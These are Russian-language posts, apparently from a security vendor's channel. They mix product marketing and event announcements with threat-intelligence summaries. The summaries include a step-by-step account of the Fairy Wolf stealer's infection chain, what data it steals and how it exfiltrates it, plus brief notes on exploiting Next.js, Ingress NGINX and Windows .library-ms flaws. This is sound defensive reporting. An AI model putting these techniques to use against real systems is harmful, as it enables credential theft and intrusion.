🌜 Fairy Wolf качает мышцы

Недавно специалисты команды BI.ZONE Threat Intelligence выявили новую кампанию группировки Fairy Wolf, в рамках которой злоумышленники маскировали стилер Unicorn под легитимные файлы.

Атакующие распространяли архив Тех.схема-№4533, внутри которого находился ярлык Windows Проект№4533.pdf.lnk.

Примечательно, что LNK-файл содержал текст популярной в сети песни бодибилдеров Даниила Изместьева и Виктора Костырева.

При запуске LNK-файла происходила компрометация системы по следующей схеме:

1. С использованием утилиты mshta.exe загружается вредоносный HTA-файл, замаскированный под PDF, с ihsue[.]telehram[.]org.

2. Загруженный sbtotakz.pdf содержит VBS-скрипт, который отвечает за создание на диске следующих файлов:

• crash_report.vbs — обходит директории пользователя и собирает файлы с заданными расширениями;
• service_report.vbs — собирает файлы с заданными расширениями на съемных носителях;
• core_stablity_report.vbs — собирает учетные данные мессенджера Telegram и браузеров;
• utility_report.vbs — отвечает за эксфильтрацию собранных данных;
• update_logging.vbs — отвечает за закрепление в системе и в качестве механизма самозащиты пересоздает на диске перечисленные выше файлы.

Дополнительно скрипт создает в реестре (в ветках Search Band, Core и Servers, расположенных в Software\Yandex Service) ключи WB, MX, KM, GE, GF и др., куда записывает зашифрованный код VBS-функций. Эти функции затем используются вышеуказанными скриптами.

3. Закрепление в системе происходит через модификации раздела реестра CurrentVersion\Run, а также путем добавления задания в планировщике задач.

4. Стилер собирает файлы размером менее 100 МБ с расширениями: .doc, .docx, .rtf, .odt, .xls, .xlsx, .csv, .ods, .vsdx, .vdx, .zip, .rar, .7z, .tar, .jpg, .jpeg, .png, .pdf, .txt, .cdr, .kmz, .kml, .dwg, .dxf, .bak. 

Также извлекает содержимое папки %APPDATA%\Telegram Desktop\tdata и учетные данные браузеров «Яндекс», Google Chrome, Edge, Opera.

5. Информация о скопированных файлах и дате их последней модификации сохраняется в текстовых файлах apgs, ipgs, opgs, чтобы сверяться с ними при каждом запуске.

6. Эксфильтрация выполняется через POST-запрос на URL, cгенерированный методом DGA.

Пока Fairy Wolf качает мышцы, BI.ZONE Threat Intelligence не отстает и добавляет новые инструменты.

⚙️ Как внедрить PAM-систему, чтобы IT-специалистам стало проще жить

Мы уже рассказывали, как Сбер внедрил BI.ZONE PAM вместо зарубежного решения CyberArk. Сейчас самое время поделиться, как это повлияло на повседневную работу тысяч инженеров.

Один из примеров — оптимизация массовых подключений благодаря MFA-кешированию. Теперь DevOps-, SRE-инженерам и администраторам требуется меньше действий, чтобы подключиться одновременно к большому числу систем.

А еще BI.ZONE PAM поддерживает Ansible playbooks, поэтому IT-специалисты могут удобно и безопасно автоматизировать работу.

Подробности — в карточках и на сайте.

⚡️ Выложили запись вебинара «BI.ZONE EDR: на шаг впереди инцидента»

Рассказали, какие функции появились у решения за последнее время и как они помогут укрепить защиту конечных точек. 

Из видео вы узнаете о новых возможностях сбора телеметрии, мониторинга и автоматического реагирования. 

Смотреть запись

🌝 Атаки с дорогими последствиями и защита за пределами веб-приложений

Наши эксперты выступили на CISO FORUM 2025 с докладами об актуальных угрозах и ошибочных подходах к безопасности.

Смотрите видео выступлений:

🔵Дешевые атаки с дорогими последствиями

Почему атаковать стало проще, какие инструменты используют злоумышленники и как бизнесу защититься от самых доступных способов вторжения.

🔵За пределами веба. Комплексная защита инфраструктуры от DDoS-атак

Как выглядит современная DDoS-атака, что остается незамеченным за периметром веб-приложений и зачем проводить регулярные стресс-тесты инфраструктуры.

В фокусе обоих докладов — реальные риски для бизнеса, кейсы, а также подходы, которые мы используем на практике.

💼 BI.ZONE GRC на CISO FORUM 2025: как мы строим киберзащиту для крупных компаний

На CISO FORUM 2025 мы пообщались с Андреем Быковым, руководителем BI.ZONE GRC.

Он рассказал:

🟦Почему управление IT-активами — основа защиты бизнеса.
🟦Как автоматизировать процессы кибербезопасности в крупных холдингах.
🟦Как наш клиент за 2,5 года кратно вырастил уровень зрелости безопасности в группе из 200+ компаний.

➡️Смотреть интервью

Вы можете запросить бесплатное демо BI.ZONE GRC, чтобы оценить решение на практике.

🌛 CVE-2025-24364 и CVE-2025-24365: анализируем уязвимости в Vaultwarden

По данным BI.ZONE TDR, в 2025 году Vaultwarden использует каждая десятая российская компания.

Поскольку секреты от других внутренних сервисов хранятся в Vaultwarden, при его взломе атакующий узнает и их. А если продукт автоматически получает секреты с помощью API, злоумышленник попадет на хост с обширной сетевой связностью.

Наша группа исследования уязвимостей проанализировала Vaultwarden. В результате мы обнаружили две уязвимости высокого уровня опасности: CVE-2025-24364 и CVE-2025-24365.

В статье разобрали, как устроены эти уязвимости, и дали рекомендации, как избежать их эксплуатации.

🔍 Самые популярные и необычные способы пивотинга

Чтобы проникнуть в важные сегменты, злоумышленники могут прибегать к пивотингу. Эта техника позволяет использовать скомпрометированное устройство для дальнейшего проникновения в сеть.

В новой статье мы рассказали:

🔵как работает пивотинг,
🔵какие методы встречались в 2024 году чаще всего,
🔵какие необычные способы скоро могут стать популярными.

➡️Читать статью

🚀 Еще больше возможностей для управления распределенной сетью

В новой версии BI.ZONE Secure SD-WAN мы повысили отказоустойчивость сетевой инфраструктуры и добавили полезные функции для распределенных компаний.

Что появилось:

🔵8 одновременно работающих интернет-каналов (NxWAN) вместо 2

Это повышает отказоустойчивость и дает больше гибкости при масштабировании.

🔵Географическое резервирование контроллеров

Их можно развернуть в разных локациях, но подключены они будут к одной инфраструктуре. При сбое основного контроллера система автоматически переключается на резервный.

🔵Кластер из двух сетевых устройств

Если одно устройство выходит из строя, второе продолжает работу. Это значимо для критически важных сервисов.

Обновление особенно актуально для организаций с высокими требованиями к доступности: банков, компаний из сфер здравоохранения, промышленности, телекома.

Подробнее

🌕 Как Watch Wolf атакует российский бизнес

На фоне громких кибератак на крупные компании деятельность небольших группировок заметна меньше. Но она тоже наносит серьезный ущерб.

Одна из таких — кластер Watch Wolf в таксономии BI.ZONE Threat Intelligence, также известный как Buhtrap. Участники этой группировки атакуют преимущественно средний и малый бизнес.

Мы уже рассказывали об одном из инцидентов, а теперь делимся полноценным исследованием кластера от команды BI.ZONE DFIR.

Что внутри:

🔵Подробное описание жизненного цикла атак.
🔵Известные кампании.
🔵Используемые инструменты.
🔵Меры защиты от злоумышленников.

➡️Скачать исследование

▶️ Делимся записью эфира «Коммерческий или гибридный SOC?»

В недавнем эфире AM Live эксперты разобрали:

🔵в чем плюсы и минусы разных подходов к обеспечению мониторинга и реагирования;
🔵как оценить эффективность гибридного и коммерческого SOC и различаются ли критерии;
🔵на что обратить внимание при переходе от одной модели к другой.

Видео будет полезно тем, кто строит либо развивает SOC, думает о смене модели или просто хочет свериться с лучшими практиками.

➡️Смотреть запись

Если у вас уже есть собственный SOC, пройдите наше бесплатное тестирование по оценке зрелости. После прохождения вы получите рекомендации, что и как можно улучшить.

💼 ТЕRА стала официальным дистрибьютором наших продуктов

Компания TERA специализируется на создании и обслуживании IT-инфраструктур для корпоративных клиентов.

Дистрибьюторское соглашение охватывает весь портфель решений BI.ZONE.

В частности, TERA будет поставлять российским организациям:

🔵BI.ZONE Secure SD-WAN — платформу для безопасной трансформации сети;
🔵BI.ZONE PAM — систему для управления привилегированным доступом по модели нулевого доверия;
🔵BI.ZONE EDR — решение для защиты конечных точек от сложных угроз.

Читать подробнее

🍇 BI.ZONE EDR расширяет возможности платформы Smart Monitor по выявлению угроз

Инструменты и механизмы BI.ZONE EDR были интегрированы в платформу Smart Monitor компании VolgaBlob.

Модуль Smart Monitor EDR помогает эффективнее выявлять угрозы и реагировать на киберинциденты до того, как злоумышленники успеют развить атаку.

Теперь в рамках платформы можно в реальном времени собирать и анализировать данные о событиях на конечных точках, выявляя угрозы и аномалии. В случае подозрительной активности специалист может отреагировать на инцидент сразу из интерфейса Smart Monitor.

Кроме того, интеграция позволяет автоматизировать рутинные задачи и оптимизировать трудозатраты.

Читать подробнее

🌝 Выложили запись вебинара «Киберразведданные на практике: как получить максимум»

Мы рассказали об угрозоцентричном подходе к безопасности: в чем он заключается и как внедрить его в вашей компании.

А еще показали новые инструменты на портале BI.ZONE Threat Intelligence, которые помогают реализовать подход на практике, — «Теневые ресурсы» и матрицу MITRE ATT&CK. 

В конце вебинара ответили на лучшие вопросы зрителей. 

Смотреть запись

⚡️ Через час встретимся на вебинаре об обновлении BI.ZONE EDR

Вы узнаете, как новые возможности решения помогут укрепить защиту конечных точек, а также получите ответы на интересующие вопросы. 

Начнем в 11:00, подключайтесь!

⚡️ Завтра обсудим, как быть на шаг впереди инцидента с помощью BI.ZONE EDR

Расскажем, какие функции появились у решения за последнее время, и ответим на ваши вопросы. 

Зарегистрироваться

▶️ Что важно знать об identity security

Делимся конспектом и записью эфира AM Live, где эксперты обсудили:

🔵задачи, которые решает identity security,
🔵типичные ошибки при внедрении,
🔵ключевые векторы развития в ближайшие 1–2 года.

Будет полезно всем, кто отвечает за архитектуру доступа, IAM, PAM, киберзащиту и управление учетными записями.

Читать конспект и смотреть видео

⭐️ TUVQaEkgQ1RG: вышли новые лекции по криптографии от CTF-кружка в МИФИ

Делимся серией записей с занятий по криптографии.

Смотрите, чтобы освоить полезные навыки для решения CTF-тасков категории Crypto. 

🔷Lattice me this
🔷Возвращение к истокам
🔷Lattice rules
🔷Always has been
🔷Умные и опасные

Презентации

🪲 Собственный VPN, поддержка комьюнити и другие особенности BI.ZONE Bug Bounty

Что привлекает вендоров в багбаунти и как белые хакеры помогают организациям защититься от киберугроз?

Редакция CNews пообщалась с Андреем Лёвкиным, руководителем продукта BI.ZONE Bug Bounty, чтобы получить ответы на эти и другие вопросы.  

В ходе интервью обсудили:

🟦статистику по уязвимостям за 2024 год;
🟦причины, по которым финансовые и государственные организации выходят на багбаунти;
🟦шаги, которые должен пройти вендор для запуска программы багбаунти;
🟦уникальные фичи нашей платформы;
🟦активное участие команды BI.ZONE Bug Bounty в популяризации багхантинга в России;
🟦планы по развитию платформы на 2025 год. 

Читать интервью

🪲 Собственный VPN, поддержка комьюнити и другие особенности BI.ZONE Bug Bounty

Что привлекает вендоров в багбаунти и как белые хакеры помогают организациям защититься от киберугроз?

Редакция CNews пообщалась с Андреем Лёвкиным, руководителем продукта BI.ZONE Bug Bounty, чтобы получить ответы на эти и другие вопросы.  

В ходе интервью обсудили:

🟦статистику по уязвимостям за 2024 год;
🟦причины, по которым финансовые и государственные организации выходят на багбаунти;
🟦шаги, которые должен пройти вендор для запуска программы багбаунти;
🟦уникальные фичи нашей платформы;
🟦активное участие команды BI.ZONE Bug Bounty в популяризации багхантинга в России;
🟦планы по развитию платформы на 2025 год. 

Читать интервью

👁‍🗨 Запускаем call for papers!

В этом году наша конфа вновь собирает лучших экспертов — и мы открываем прием заявок для спикеров.

Ждем доклады на самые разные темы: опенсорс, применение AI/ML в кибербезопасности, уязвимости в парсерах, пентест Wi-Fi и не только. Не бойтесь предложить что-то свое.

Если ваша заявка пройдет, вы получите бесплатную проходку, приглашение на Speaker party, фирменный мерчпак и другие плюшки.

Чтобы разобраться, как отбирают доклады, читайте нашу статью на «Хабре».

Кстати, заявки принимаем до 10 июля. Советуем не откладывать подачу до дедлайна.

➡️ Подать заявку

Уже на следующей неделе объявим о продаже билетов — следите за новостями.

🔥 CISO FORUM 2025 в самом разгаре

Наши спикеры выступят в лофте № 3, на 1-м этаже, в зале RATUSHA. Приходите послушать!

10:40–11:00

🔷Дешевые атаки с дорогими последствиями

Владислав Седов, ведущий специалист по анализу внешних киберугроз, BI.ZONE 


16:30–16:50 

🔷За пределами веба. Комплексная защита инфраструктуры от DDoS-атак 

🔵Дмитрий Царев, руководитель управления облачных решений кибербезопасности, BI.ZONE
🔵Эдгар Микаелян, руководитель департамента технического пресейла, Curator

А еще ждем вас на нашем стенде — будем рады пообщаться. Команды BI.ZONE GRC и BI.ZONE Brand Protection продемонстрируют продукты и ответят на вопросы.

Не все ситуации из викторины оказались реальными, но в практике BI.ZONE DFIR — сотни необычных инцидентов.

Тремя из них поделился с журналом «Информационная безопасность» Михаил Прохоренко, руководитель управления по борьбе с киберугрозами.

Вот какие истории вас ждут:

🔵Уязвимость, которую внедрил сотрудник службы безопасности.
🔵Неожиданный пентест инфраструктуры банка.
🔵Краткий гайд по взлому компаний от злоумышленника в журнале кейлоггера.

Читать кейсы

🌝 За годы практики в реагировании на инциденты мы встречали такие неординарные ситуации, что они казались выдуманными — настолько были абсурдны.

Попробуйте угадать, с какими кейсами мы на самом деле сталкивались в работе.

Правильный ответ узнаете сразу после выбора варианта :)

🔍 SSTI в Python под микроскопом: разбираем Python-шаблонизаторы

SSTI (server-side template injection) — популярная уязвимость, которую можно обнаружить в рамках багбаунти и пентестов.

В новой статье на «Хабре» разобрали, какой импакт могут получить атакующие, используя SSTI в пяти самых популярных шаблонизаторах для Python.

А еще описали, как работают известные PoC, и поделились вариантами их улучшения. Эта информация может быть полезна при тестировании приложений.

Читать статью

⚡️ Всё о нашем CFP

Совсем скоро мы откроем наш традиционный call for papers. Каждый год нас спрашивают, как стать спикером на нашей конференции, и задают еще кучу вопросов.

Как работает прием заявок? Почему мой доклад не приняли и что с этим делать? А мерч за выступление дадите? Дадим :) А какой? И так далее.

Чтобы call for papers был для вас более прозрачным, подробно рассказали о нем на «Хабре».

А еще на нашем сайте есть FAQ, где собраны ответы на все вопросы про OFFZONE.

⚡️ Всё о нашем CFP

Совсем скоро мы откроем наш традиционный call for papers. Каждый год нас спрашивают, как стать спикером на нашей конференции, и задают еще кучу вопросов.

Как работает прием заявок? Почему мой доклад не приняли и что с этим делать? А мерч за выступление дадите? Дадим :) А какой? И так далее.

Чтобы call for papers был для вас более прозрачным, подробно рассказали о нем на «Хабре».

А еще на нашем сайте есть FAQ, где собраны ответы на все вопросы про OFFZONE.

⁉️ Как грамотно внедрить процессы управления уязвимостями в компании

Vulnerability management — это системный процесс поиска и устранения недостатков в IT-инфраструктуре до того, как ими воспользуются злоумышленники.

Он помогает перейти от реактивного исправления последствий атак к проактивной защите, снижая риски взломов, утечек и штрафов за несоблюдение стандартов.

На эфире AM Live эксперты расскажут:

🔵как создать эффективные процессы управления уязвимостями,
🔵что делать на каждом этапе,
🔵как распределять обязанности и ответственность в кросс-функциональных командах,
🔵какие инструменты помогут управлять уязвимостями,
🔵как измерять качество выстроенного процесса и улучшать его.

Нашим опытом поделится Пётр Куценко, руководитель BI.ZONE EDR.

Зарегистрироваться

🌚 Камень ограненный: Sapphire Werewolf использует новую версию стилера Amethyst для атак на ТЭК

Команда BI.ZONE Threat Intelligence продолжает отслеживать активность кластера Sapphire Werewolf.

В новой кампании злоумышленники отправляют жертвам фишинговые письма от имени отдела кадров и маскируют вредоносное вложение под служебную записку.

В прикрепленном архиве содержится исполняемый файл с иконкой PDF-документа. Если его запустить, начинается процесс компрометации пользовательской системы.

В качестве полезной нагрузки злоумышленники по-прежнему используют стилер Amethyst, но теперь в усовершенствованной версии.

Подробнее о новых атаках Sapphire Werewolf рассказали в статье.

🔔 Через час начинаем вебинар об угрозоцентричном подходе

Будем разбираться, как с помощью данных киберразведки быстро обнаруживать угрозы и реагировать на них. А еще расскажем, как предсказывать и предотвращать возможные атаки.

Готовьте ваши вопросы — наградим авторов лучших из них призами.

➡️Ждем вас в 11:00, подключайтесь!

▶️ Выложили запись вебинара «BI.ZОNE GRC: как работать в 5 раз быстрее, объединив 10 систем в 1»

Эксперты рассказали:

🔵Как эффективно выполнять требования по ПДн и КИИ.

🔵С какими проблемами в процессе управления уязвимостями и активами чаще всего сталкиваются компании.

🔵Как BI.ZONE GRC поможет автоматизировать процессы кибербезопасности.

Также приглашенные спикеры поделились опытом внедрения BI.ZONE GRC и кейсами использования платформы.

➡️Смотреть

🔝 Веб-уязвимостей стало в 2 раза больше за зимний период — 2024/25

По данным BI.ZONE WAF, в период с декабря по февраль было обнаружено более 4000 новых уязвимостей в веб-приложениях.

Больше трети из них (всего около 1500) — высокого или критического уровня. По сравнению с осенними показателями количество таких уязвимостей выросло на 10%.

В открытых источниках были доступны примеры эксплуатации порядка 50 уязвимостей подобных уровней. Это означает, что в среднем каждую неделю злоумышленники получали по 4 примера эксплуатации, чтобы построить атаки.

Топ-5 уязвимостей зимнего периода:

🔵XSS,
🔵SQL-инъекции,
🔵CSRF,
🔵privilege escalation,
🔵удаленное выполнение кода (RCE).

RCE — самая распространенная и серьезная угроза именно для веб-приложений. Таких уязвимостей стало в 2 раза больше по сравнению с осенью.

Наши эксперты предполагают, что всплеск веб-атак может быть связан с тем, что большинство компаний стремятся выпустить финальные релизы в канун Нового года.

В подобных условиях командам, которые отвечают за безопасность веб-приложений, необходимо максимально оперативно обновлять ПО или применять другие способы митигации угроз.

➡️Читать подробности

🌛 Как угрозоцентричный подход позволяет избежать ущерба от кибератак

В новой статье рассказали о подходе к кибербезопасности, который позволит сосредоточиться на самых актуальных угрозах.

Из нее вы узнаете:

🟦что это за подход,
🟦в чем его преимущества,
🟦как предотвращать реальные атаки, используя киберразведданные.

Читать статью

А чтобы закрепить материал, подключайтесь к бесплатному вебинару. На нем обсудим, как получить максимум от данных киберразведки и какие инструменты BI.ZONE Threat Intelligence помогут в проактивном поиске угроз для вашей организации.

➡️Зарегистрироваться

⚡️ На шаг впереди инцидента: приглашаем на вебинар об обновлении BI.ZONE EDR

Решение активно развивается во всех популярных ОС, включая отечественные дистрибутивы. Чтобы разобраться в его новых возможностях, присоединяйтесь к вебинару.

Разберем в прямом эфире эти и другие изменения:

🔵Обновленное хранилище событий телеметрии.
🔵Улучшенная функциональность выявления вредоносного поведения на Windows.
🔵Поддержка контейнерного движка Podman для Linux и macOS.
🔵Мониторинг изменений в критических объектах ОС и автономное реагирование с помощью собственных скриптов (для macOS и Linux).

Спикеры:

🟦Пётр Куценко, руководитель BI.ZONE EDR.
🟦Демьян Соколин, руководитель направления развития BI.ZONE EDR.

Кому будет полезно:

🟦CISO и руководителям отделов кибербезопасности.
🟦Руководителям и аналитикам SOC.

Когда: 15 апреля, вторник, 11:00–12:30 (мск).

➡️Зарегистрироваться

🔫 CVE-2025-24071: как работает атака через .library-ms в Windows

Наш ведущий аналитик SOC Илья Ефимов рассказал о нашумевшей уязвимости CVE-2025-24071 в статье на «Хабре».

Ее эксплуатация становится возможной, потому что Windows Explorer автоматически обрабатывает .library-ms-файлы. Атакующий может получить NTLMv2-хеши учетной записи жертвы, просто отправив ей архив (ZIP/RAR) или вложение с вредоносным файлом.

Злоумышленники уже пользуются CVE-2025-24071, а из-за простоты эксплуатации она может стать популярной в фишинговых атаках.

Из статьи вы узнаете:

🔵в чем суть уязвимости,
🔵какие события генерируются в системе в процессе эксплуатации,
🔵как обнаружить атаку.

Читать статью

🍇 Обновление BI.ZONE EDR: версия 1.37 облегчит работу с событиями

В версии для macOS:

1. Добавили функцию мониторинга операций над объектами инвентаризации

Стали доступны данные об измененном объекте и о том, какие именно изменения были внесены.

2. Усилили возможности автономного реагирования

Теперь можно дополнять встроенный набор функций собственными скриптами, запускать произвольные команды и получать результаты их выполнения.

3. Обеспечили поддержку движка контейнеризации Podman

Пользователям и администраторам теперь доступны такие события, как инвентаризация запущенных и остановленных контейнеров, факт запуска и остановки контейнера. Сейчас в BI.ZONE EDR поддерживается мониторинг трех контейнерных движков: Docker, ContainerD, Podman.

Для всех ОС:

1. Обновили раздел поиска по событиям телеметрии, которую собирают агенты EDR

Данные этого раздела применяются для анализа и расследования киберинцидентов, а также проактивного поиска угроз в рамках threat hunting.

2. Добавили возможность сохранения поисковых запросов для дальнейшего переиспользования

Теперь можно распределять запросы по папкам и делиться ими с другими пользователями.

3. Добавили возможность автоматического удаления EDR-агентов, которые долго не выходили на связь с сервером

Это поможет поддерживать на сервере актуальную информацию об агентах и упростить администрирование.

Подробнее об обновлении

🍌 BI.ZONE GRC: обновленный модуль упростит выполнение требований по защите КИИ

BI.ZONE GRC обновила модуль Compliance Management, который позволяет выполнять требования регуляторов по персональным данным, критической информационной инфраструктуре (КИИ) и государственным информационным системам.

Вот что улучшилось:

🔷Сбор и анализ данных
Обновленная платформа собирает сведения о системах, компонентах и средствах защиты через коннекторы. Это позволяет формировать дерево связей, которое наглядно показывает полную структуру системы.

🔷Контроль актуальности IT-инфраструктуры
Теперь система непрерывно мониторит соответствие документации реальному состоянию инфраструктуры и оперативно оповещает о расхождениях.

🔷Упрощение и стандартизация процессов
Платформа дает возможность создавать типовые объекты КИИ и процессы, адаптированные к особенностям различных отраслей. Процесс администрирования стал проще, а уровень стандартизации операций повысился.

🔷Оптимизация категорирования
Теперь консолидировать данные во всех подразделениях стало проще. В платформу встроены инструменты, которые запускают опросы для комиссии по категорированию, а также автоматизированный анализ критериев значимости.

🔷Автоматическое моделирование угроз
Платформа самостоятельно оценивает угрозы и риски, что снижает потребность в ручном анализе.

Подробнее об обновлении

🐗 Встретимся на CISO FORUM 2025

В этом году событие пройдет 10 апреля в LOFT HALL. 

Наши эксперты выступят с докладами:

➡️Дешевые атаки с дорогими последствиями
Владислав Седов, ведущий специалист по анализу внешних киберугроз, BI.ZONE

➡️За пределами веба. Комплексная защита инфраструктуры от DDoS-атак
🟦Дмитрий Царев, руководитель управления облачных решений кибербезопасности, BI.ZONE
🟦Эдгар Микаелян, руководитель департамента технического пресейла, Curator 

Также приглашаем на наш стенд, где вас будут ждать:

🟦Live-демо и презентация решения BI.ZONE GRC. 
🟦Консультации экспертов по возможностям BI.ZONE Brand Protection. 
🟦Ответы на вопросы о наших продуктах. 

Зарегистрироваться

🐂 Мы на «Территории безопасности»!

Заходите к нам на стенд обсудить кибербез. Мы угостим вас шоколадками, а еще разыграем призы за подписку на наши новости:

🔵5 каменных кружек,
🔵3 коврика для мыши,
🔵и 16 килограммов нашего уважения в виде головы бизона.

Чтобы участвовать, сканируйте QR-код у нас на стенде и следуйте инструкциям в чат-боте.

🥥 Команда BI.ZОNE WAF зафиксировала эксплуатацию критической уязвимости на сайтах WordPress

Атакующие используют директорию mu-plugins для сокрытия и запуска вредоносного кода.

Уязвимость найдена в модуле must-use plugins — это тип плагинов для WordPress, которые запускаются при каждой загрузке страницы и не требуют активации. 

Первые упоминания об уязвимости появились в феврале 2025 года, а техника ее эксплуатации описана в исследовании Sucuri.

Вектор атаки еще не получил оценку, но специалисты BI.ZONE WAF определяют ее как критическую, поскольку эта техника позволяет обращаться к веб-шеллу.  

Злоумышленники обычно используют содержимое mu-plugins:

🟦для перенаправления посетителей ресурса на сторонние сайты и загрузки вредоносного ПО;
🟦эксплуатации веб-шелла, который действует как бэкдор;
🟦загрузки вредоносного JavaScript.

Обновлений, защищающих от этой угрозы, пока не выпущено.

Команда BI.ZONE WAF наблюдает попытки эксплуатации уязвимости. За прошедшие два дня отмечено более 250 запросов у 13 организаций.

Для безопасности пользователей, помимо стандартных правил защиты, мы блокируем возможность обращений к директории mu-plugins для всех пользователей, предотвращая выполнение вредоносных плагинов.

🌝 Проверьте, готов ли ваш SOC к усиленной защите от киберугроз

Регулярный анализ работы SOC позволяет видеть сильные и слабые стороны вашей системы кибербезопасности. Мы составили карточки, которые охватывают 7 направлений такого анализа.

А более полную картину даст наше бесплатное тестирование, которое разработали эксперты BI.ZONE SOC Consulting.

После прохождения вы получите файл с подробными рекомендациями, что и как можно улучшить.

➡️Пройти бесплатный тест

🔔 Расскажем про багбаунти, киберразведку и PAM на «Территории безопасности»

3 апреля состоится II Форум «Территория безопасности 2025: все pro ИБ». Ежегодно в рамках мероприятия проходят четыре конференции и выставка российских технологий в сфере кибербезопасности.

Три наших эксперта выступят с темами:

🔵поиска уязвимостей;
🔵реагирования на инциденты;
🔵контроля доступа к критическим данным.

Расписание выступлений смотрите в карточках.

Спикеры будут выступать в разных секциях. Подробности — на сайте форума.

☑️ Провели онлайн-релиз BI.ZОNE Mail Security

Запись уже доступна по ссылке. Из нее вы узнаете:

🟦Какие почтовые угрозы актуальны в 2025 году.
🟦Как BI.ZONE Mail Security блокирует даже самые сложные атаки и адаптируется к новым угрозам.
🟦Почему решение защищает не только почтовые ящики, но и пользователей.

➡️Смотреть запись

🌝 Запускаем бесплатную версию портала киберразведки

BI.ZONE Threat Intelligence содержит обширный массив данных о ландшафте киберугроз России и других стран. Базовая информация о злоумышленниках теперь доступна в публичной версии.

Помимо короткого описания кластера вы узнаете:

🟦название группировки по таксономии BI.ZONE и альтернативные наименования,
🟦тип мотивации,
🟦время начала активности,
🟦атакуемые страны,
🟦используемые инструменты.

Вы также можете отфильтровать группировки по отрасли, стране и типу мотивации, а из карточек кластеров — сразу перейти к связанным техническим статьям от наших экспертов.

Бесплатная версия портала дает общее представление о данных, которые собирают и анализируют специалисты BI.ZONE Threat Intelligence. С ее помощью компании могут определить опасные для своей отрасли группировки и укрепить защиту. 

Попробовать бесплатную версию

💡 Коммерческий или гибридный SOC?

2 апреля в эфире AM Live эксперты разберут подходы к обеспечению мониторинга событий кибербезопасности. От нас выступит Марсель Айсин, руководитель BI.ZONE SOC Consulting.

Спикеры обсудят:

🔵критерии выбора коммерческой и гибридной модели,
🔵плюсы и минусы каждого варианта,
🔵оценку эффективности центра мониторинга и SLA,
🔵риски при переходе от одной модели к другой.

Если вы уже сделали выбор в пользу собственного SOC, оцените его зрелость и узнайте о зонах роста с помощью нашего тестирования. Это бесплатно :)

💡 Коммерческий или гибридный SOC?

2 апреля в эфире AM Live эксперты разберут подходы к обеспечению мониторинга событий кибербезопасности. От нас выступит Марсель Айсин, руководитель BI.ZONE SOC Consulting.

Спикеры обсудят:

🔵критерии выбора коммерческой и гибридной модели,
🔵плюсы и минусы каждого варианта,
🔵оценку эффективности центра мониторинга и SLA,
🔵риски при переходе от одной модели к другой.

Если вы уже сделали выбор в пользу собственного SOC, оцените его зрелость и узнайте о зонах роста с помощью нашего тестирования. Это бесплатно :)

🌜 Охота на угрозы проходит успешно

1 апреля традиционно обращаемся к пушистым экспертам. Эти котики обычно помогают нашим коллегам, но сегодня поделятся кибер-мурр-дростью со всеми.

🌛 Три пути к мониторингу и реагированию на инциденты

Одни компании ограничиваются базовой защитой, а другим необходим полный контроль киберугроз. Поэтому в BI.ZONE TDR предусмотрено три тарифа:

🔵BI.ZONE TDR Horizon — анализирует события c штатных подсистем аудита.

🔵BI.ZONE TDR Focus — анализирует события и реагирования с помощью EDR.

🔵BI.ZONE TDR Panorama — объединяет возможности Horizon и Focus.

Личный кабинет и многофункциональный телеграм-бот доступны в каждом тарифе. А их отличия мы разобрали в карточках.

➡️Кстати, протестировать BI.ZONE TDR можно бесплатно.

🥥 BI.ZОNE WAF защищает от критической уязвимости в Kubernetes — Ingress Nightmare

Найдена критическая уязвимость в популярных ingress-контроллерах для Kubernetes, которые управляют входящим в кластер трафиком. Неофициально она получила название Ingress Nightmare.

CVE-2025-1974, допускающую первичный доступ, оценили в 9,8 по шкале CVSS. Также зарегистрированы и другие уязвимости, связанные с развитием вектора атаки: CVE-2025-24513, CVE-2025-24514, CVE-2025-1097, CVE-2025-1098. 

Первичная уязвимость найдена в Ingress NGINX Controller, использующем NGINX в качестве обратного прокси-сервера и балансировщика нагрузки. Проблема кроется в компоненте Kubernetes Admission Controllers — это механизм, который отвечает за обработку запросов к API-серверу Kubernetes. 

Эксплуатация CVE-2025-1974 позволяет злоумышленнику с минимальным доступом к сети обратиться к произвольной конфигурации Ingress Nginx и реализовать удаленное исполнение кода (RCE) при помощи отправки HTTP-запроса AdmissionReview. 

По статистике команды BI.ZОNE WAF, уязвимость затрагивает порядка 43% облачной инфраструктуры. 

Разработчики устранили проблему в версиях ingress-nginx v1.11.5 и 1.12.1.

Если вы используете уязвимую версию ПО, от CVE-2025-1974 поможет защититься BI.ZONE WAF. Решение блокирует возможность использования внешних обращений AdmissionReview, что закрывает первичный доступ и не позволяет развивать атаку дальше.

Также правила обнаружения уязвимости в рамках активного сканирования добавлены в BI.ZONE CPT.

⚙️ Через час расскажем, какие 3 основные задачи есть у CISO

Обсудим, какие процессы кибербезопасности можно автоматизировать почти полностью, познакомим с возможностями BI.ZONE GRC.

Также во время эфира разберем кейсы внедрения платформы от приглашенных экспертов и ответим на вопросы, а авторам самых интересных вопросов подарим призы.

Подключайтесь в 11:00

⚙️ Завтра обсудим, как CISO выполнить основные задачи

Вы узнаете, с чего начать работу CISO, какие ключевые процессы кибербезопасности есть в компании и какие из них можно автоматизировать почти полностью. Приглашенные гости поделятся опытом внедрения BI.ZONE GRC.

Во время эфира вы сможете задать спикерам вопросы, а за самые интересные из них мы подарим призы.

Зарегистрироваться

🔍 Как проверить текущее состояние собственного SOC за 15 минут

Уровень зрелости центра мониторинга напрямую влияет на скорость обнаружения угроз, качество анализа инцидентов и минимизацию бизнес-рисков.

Вот как оценить уровень зрелости:

1. Пройдите наш тест — он охватывает 7 направлений работы SOC.

2. Получите автоматический отчет с экспертными рекомендациями.

3. Начните применять их самостоятельно или обратитесь за консультацией к специалистам BI.ZONE SOC Consulting.

➡️Перейти к тесту

🥥 BI.ZОNE WAF защищает от уязвимости в популярном фреймворке для создания веб-приложений на базе React

Уязвимость CVE-2025–29927 нашли в компоненте Next.js, выполняющем обработку запросов и ответов в конвейере приложения. 

Первые упоминания уязвимости появились 22 марта, а на следующий день в сети появилось несколько PoC для ее эксплуатации. 

Угрозу оценили в критические 9,1 балла по шкале CVSS. Уязвимость позволяет просматривать содержимое защищенной страницы без авторизации при условии добавления заголовка x-middleware-subrequest с полезной нагрузкой.

Было найдено множество уникальных значений для эксплуатации уязвимости с использованием указанного заголовка — все зависит от версии приложения.

Разработчики устранили уязвимость в обновлениях:

🟦для Next.js 15.x — в версии 15.2.3,
🟦Next.js 14.x — в 14.2.25,
🟦Next.js 13.x — в 13.5.9,
🟦Next.js 12.x — в 12.3.5. 

